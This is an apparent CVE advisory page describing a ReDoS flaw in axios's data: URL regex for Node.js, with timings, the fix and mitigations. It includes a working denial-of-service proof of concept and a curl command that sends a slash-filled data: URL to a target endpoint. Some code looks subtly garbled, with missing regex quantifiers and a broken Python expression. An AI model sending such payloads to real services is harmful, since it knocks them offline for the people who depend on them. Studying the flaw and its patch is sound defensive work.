Axios (Nodejs), ReDoS, CVE-2026-101903 (High) -DC-Sep2026-2672

Listen to this Post

Axios for Node.js parses data: URLs in lib/helpers/fromDataURI.js using a regular expression that is vulnerable to Regular Expression Denial of Service (ReDoS). The vulnerable pattern is: /^([^,;]+\/[^,;]+)?((?:;[^,;=]+=[^,;]+))(;base64)?,([\s\S])$/. The media type character class [^,;]+ includes the forward slash /, meaning the type and subtype portions can each contain multiple slashes. When an attacker supplies a data: URL consisting of many slashes with no comma, the regex engine must try every possible partition of the string around the required \/ separator before concluding the match fails. This produces quadratic O(n²) backtracking behavior, where the number of regex steps grows with the square of the input length. The parsing runs synchronously on the Node.js main thread, completely blocking the event loop for the duration of the regex evaluation. Because the freeze occurs during parsing and before any network timer can fire, configured timeouts do not mitigate the attack. The vulnerability is reachable through the public API when applications pass untrusted URL strings to axios.get() or equivalent calls where config.url has the data: protocol. Browser fetch/XHR adapters are not affected because they do not invoke fromDataURI. Local timing on axios 1.18.1 showed approximately 2.4 ms at 1000 slashes, 16.6 ms at 3000 slashes, and 71.5 ms at 6000 slashes, confirming the quadratic scaling. At larger payloads, a 32 KB data: URL freezes the event loop for 6.3 seconds, 64 KB for approximately 24 seconds, 128 KB for approximately 96 seconds, 256 KB for approximately 385 seconds (6.4 minutes), and 1 MB for approximately 100 minutes. During the freeze, the server answers nothing — health checks time out, and the event-loop monitor cannot log until parsing completes. The attacker controls only the URL string and requires no authentication. A trickle of approximately 256 KB every 6 minutes (about 0.7 bytes per second) keeps a server permanently unavailable. The issue is availability-only; it does not disclose data or modify requests. The CVSS 3.1 score is 7.5 (High) with vector AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H. The fix excludes / from the media type character classes, changing the regex to: /^([^,;/]+\/[^,;/]+)?((?:;[^,;=]+=[^,;]+))(;base64)?,([\s\S])$/. Worst-case parse time drops from approximately 2600 ms to approximately 0.002 ms. All valid data: URLs, including slashes in the body, parse identically. The vulnerability was fixed in axios version 1.20.0, released on August 19, 2026.

DailyCVE Form:

Platform: Axios Node.js
Version: 1.16.1-1.19.x
Vulnerability: ReDoS data URL
Severity: High
date: 2026-09-28

Prediction: 2026-08-19

What Undercode Say

Check axios version in your project
npm list axios
Install the patched version
npm install [email protected]
Test with a malformed data URL
node -e "
const axios = require('axios');
const start = Date.now();
axios.get('data:' + '/'.repeat(6000)).catch(() => {
console.log('Parse blocked event loop for:', Date.now() - start, 'ms');
});
"
// Vulnerable regex in lib/helpers/fromDataURI.js
const DATA_URL_PATTERN = /^([^,;]+\/[^,;]+)?((?:;[^,;=]+=[^,;]+))(;base64)?,([\s\S])$/;
// Fixed regex in axios 1.20.0
const DATA_URL_PATTERN = /^([^,;/]+\/[^,;/]+)?((?:;[^,;=]+=[^,;]+))(;base64)?,([\s\S])$/;
Simulate DoS attack against a vulnerable endpoint
curl -X POST http://target/api/fetch-url \
-H "Content-Type: application/json" \
-d "{\"url\": \"data:$(python3 -c 'print("/"262139)')\"}"

Exploit: (Educational Purposes!)

import axios from 'axios';
// Minimal proof of concept
// Blocks event loop approximately 6 minutes then throws
await axios.get('data:' + '/'.repeat(262139));
// Server-side link preview service vulnerable pattern
app.post('/fetch-url', async (req, res) => {
const { url } = req.body;
const response = await axios.get(url, { timeout: 1000 });
res.json({ data: response.data });
});
// Attacker sends: { "url": "data:" + "/".repeat(262139) }
// Result: server unresponsive for ~6.4 minutes

Protection: from this CVE

Upgrade to axios version 1.20.0 or later. Reject data: URLs before passing untrusted input to axios. Enforce a strict maximum URL length for URL-fetching endpoints. Applications that do not require data: URL support should deny that protocol explicitly. Validate and sanitize all user-supplied URL strings before passing them to axios. Implement request-level input validation that blocks or truncates excessively long URL strings. Use a Web Application Firewall (WAF) rule to detect and block data: URLs containing abnormal slash sequences.

Impact:

Unauthenticated remote denial of service. A single small request takes a Node.js service fully offline for minutes. A continuous trickle of approximately 0.7 bytes per second keeps the server permanently unavailable. During the attack window, the server cannot respond to any requests, including health checks and liveness probes. The event loop is completely frozen, preventing all asynchronous operations. The vulnerability is availability-only and does not result in data disclosure or request modification. In production environments, this can cause service outages, failed health checks triggering container restarts, and cascading failures in dependent microservices.

🎯Let’s Practice Exploiting & Learn Patching For Free:

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top